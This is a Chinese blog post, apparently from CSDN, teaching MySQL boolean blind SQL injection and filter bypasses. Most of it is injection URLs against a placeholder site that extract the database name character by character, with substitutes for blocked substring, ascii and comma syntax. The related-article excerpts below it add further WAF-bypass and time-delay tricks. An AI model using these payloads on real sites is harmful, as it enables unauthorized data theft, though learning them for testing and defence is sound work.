mysql盲注绕过_盲注 绕过技巧

最新推荐文章于 2023-03-24 16:40:26 发布
最新推荐文章于 2023-03-24 16:40:26 发布
阅读量201 收藏
点赞数
文章标签: mysql盲注绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39907133/article/details/113396787
版权

http://www.x.com/sections_intr.php?id=181 and length((database()))=4

http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122

http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),2,1))=122

http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),3,1))=102

http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),4,1))=121

substring过滤的时候替换成mid

http://www.x.com/sections_intr.php?id=181 and  ascii(mid(database(),1,1)) =122

substring过滤的时候替换成substr   substr()  Mid()等价于 substring() 函数

http://www.x.com/sections_intr.php?id=181 and  ascii(substr(database(),1,1)) =122

当然还可以使用 substring mid  left right  substr REGEXP

盲注简单的来说 就是一个字符 一个字符一个字符匹配

ascii过滤的时候替换成ord

http://www.x.com/sections_intr.php?id=181 and  ord(mid(database(),1,1))=122

绕过不能使用使用逗号的情况

ascii(mid(user(),1,1))=150

绕过的方法是使用from x for y。语法类似:

mid(user() from 1 for 1)

substr(user() from 1 for 1)

以上同样是从第一个字符开始,取一位字符。

那么,不带逗号注入的语法,就可以变成:

mysql> select ascii(substr(user() from 1 for 1)) < 150;

122=z  102=f  121=y

库名:zzfy

ascii码表 http://app.baidu.com/app/enter?appid=218548

weixin_39907133
关注
教科书般的mysql布尔型盲注(附验证脚本)
qq_35855403的博客
08-16 1670
遇到一收费外挂,登录处抓包http://115.159.147.96/ap_Verify.php?a=nb&amp;user=asdasdasdas&amp;pass=A3DCB4D229DE6FDE0DB5686DEE47145D&amp;key=8E7CACDD62339A1D7A100347055D9104&amp;ver=163&amp;soft=VM&amp;num=EJGDCHHCDX...
mysql时间盲注if的绕过_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_42382703的博客
01-19 943
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
盲注 绕过技巧
weixin_34358092的博客
01-04 340
http://www.x.com/sections_intr.php?id=181 and length((database()))=4http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122 http://www.x.com/sections_intr.php...
mysql盲注绕过_SQL注入技巧之显注与盲注中过滤逗号绕过详析
weixin_26820341的博客
01-27 307
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中...
盲注绕过总结
jie_a的博客
06-08 179
最近在各种师傅们的花式盲注下,惊呆了我和我的小伙伴 我觉得是时候总结一下了,下次直接套用,嘻嘻 基础盲注: 判断数据: and substr((select 列名 from database().表名 limit 0,1),1,1)=‘z’ 1’ascii(substr((select flag from flag ) ,{0},1))>{1} id=1’ and left((select database()),1)=‘s’ left:从字符表达式最左边一个字符开始返回指定数目的字符 判断数据库库名
实验吧_认真一点(各种绕过下的盲注
a173262565的博客
04-01 138
打开链接,看到这个页面,一脸又是sql注入的样子 翻翻源码没有任何提示 打开burp开始抓包,包头与返回头又没有任何提示,试着开始修改ID 的值,观察页面变化 当我输入id=1'时,页面返回“you are not in.......”,当输入id=1'and时,页面返回Sql injection detected!,说明and被过滤了 接着就是开始试服务器到底过滤了哪些字符:a...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行注入攻击,其中联合查询和盲注是两种主要的方式。 1. 联合查询显注绕过逗号 在传统SQL注入中,通常...
MSSQL注入绕过
聚鼎安全
12-24 1561
目录:绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句:绕D盾 绕过特性 前言 我们经常利用一些数据库特性来进行WAF绕过。 在MSSQL中,比如可以这样: 浮点数形式:id=1.1union select 科学计数法形式:id=1e0union select 但其实还可以这样子:id=1.eunion select 通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSs
aleenzz#MYSQL_SQL_BYPASS_WIKI#2-5-我与云锁有个约会1
07-25
以下内容都是把云锁的增强型防护开启简单的布尔盲注生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释看到这两条语句其实我们可以清楚的知
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
2. 掌握多种常见的SQL注入绕过技巧,增强防御SQL注入的能力。 二、实验内容 实验涉及的主要绕过策略包括: 1. 注释符绕过:利用SQL语句中的注释符,如`--`、`/**/`、`#`,将无效的SQL代码注释掉,使有效代码得以...
MySQL注入及绕过备忘录
weixin_43610673的博客
04-25 5181
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
针对MYSQL手工盲注的步骤
cbhjerry的博客
01-30 8837
一、基于布尔的盲注: 1.判断是否存在注入,注入是字符型还是数字型,例:1 or 1=1,1' or '1'='1 2.猜解当前数据库名,例:猜长度 and length(database())=1 #,逐个猜字符and ascii(substr(databse(),1,1))>97# 3.猜解数据库中的表名,例:猜表数量  and (select count (table_name) fr
mysql bool盲注_bool盲注+各种姿势绕过过滤和替换
weixin_35019679的博客
01-27 841
题目来源题目界面比较简单,只让你输入id,输对了告诉你 You are in,输错了就 You are not in可以想到这是一个盲注,经简单测试,提交字母a进不去,1可以。也就是说通过注入如果进去了,说明注入的语句成功执行,反之没有执行,典型的bool盲注bool盲注的一般思路一般来说,bool盲注通常是通过一位一位爆破字符来实现的,常用的函数如下:1234567891011121314151...
mysql 注释 绕过_sql注入绕过方法
weixin_35437039的博客
01-20 1831
一、注释符号绕过在sql中常用的注释符号有--、#、/*xxx*/、二、大小写绕过当web正则过滤的时候对大小写不敏感的情况下使用,一般很少会有这种漏洞比如当过滤了select的时候我们可以采用SEleCT来查询三、内联注释绕过把要使用的查询语句放在/*。。。*/中,这样在一般的数据库是不会执行的,但是在mysql中内联注释中的语句会被执行。四、双写关键字绕过有的waf只会对关键词过滤一次,这时候...
MySQL注入绕过
最新发布
tcsecXD的博客
03-24 448
本文主要结合本人绕过最近某rasp和一些waf的经验,分享绕过waf的思路,MySQL测试版本(8.0.31)。
数据库盲注绕过过滤方法
菜鸟-传奇
08-21 947
盲注绕过过滤方法 一、=被过滤 1、可以使用通配符like或者REGEXP 比如想要查询id为8的数据一般会使用select * from users where id=8; 等于被过滤的话可以使用 或者<、> 或者!(<>)不不等于 使用between 二、引号被过滤 使用十六进制 把单引号的内容全部转换为十六进制 三、逗号,被过滤...
mysql延迟_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_35972981的博客
01-18 866
转自cdxy师傅:https://www.cdxy.me/?p=789PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00...
【22】WEB安全学习----MySQL注入-7(绕过限制)
尚未佩妥剑 转眼便江湖
09-20 1508
注释符:-- 、#、/**/绕过 只能闭合后面的语句,使其成为正确的SQL语句。 $sql="SELECT username FROM users WHERE id='{$id}' limit 0,1;" $id=-1' union select version() '1; $sql="SELECT username FROM users WHERE id='-1' union selec...
SQL注入绕过技巧:新手实用的避开WAF方法
在SQL注入攻击中,绕过速查表是渗透测试人员常用的技巧,特别是对于新手来说,理解并掌握这些方法能有效提高攻击效率和隐蔽性。本文将介绍几种常见的SQL注入绕过技术,包括但不限于: 1. **绕过Web应用防火墙(WAF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值